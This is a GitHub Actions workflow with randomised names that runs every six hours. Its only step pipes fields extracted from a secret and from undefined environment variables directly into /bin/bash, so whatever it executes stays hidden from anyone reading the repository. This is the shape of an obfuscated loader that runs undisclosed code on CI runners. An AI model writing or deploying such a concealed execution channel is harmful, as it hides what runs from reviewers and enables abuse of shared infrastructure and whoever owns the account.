name: qinmianhong6234

on:
  workflow_dispatch:
  schedule:
    - cron: '16 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qinmianhong6234
        env:
          j7: ${{ secrets.j7 }}
        run: |
          echo $j7 | jq -r .x88 | /bin/bash
          echo $rk52 | jq -r .rqi837 | /bin/bash
          echo $o6784 | jq -r .inkbs49964 | /bin/bash

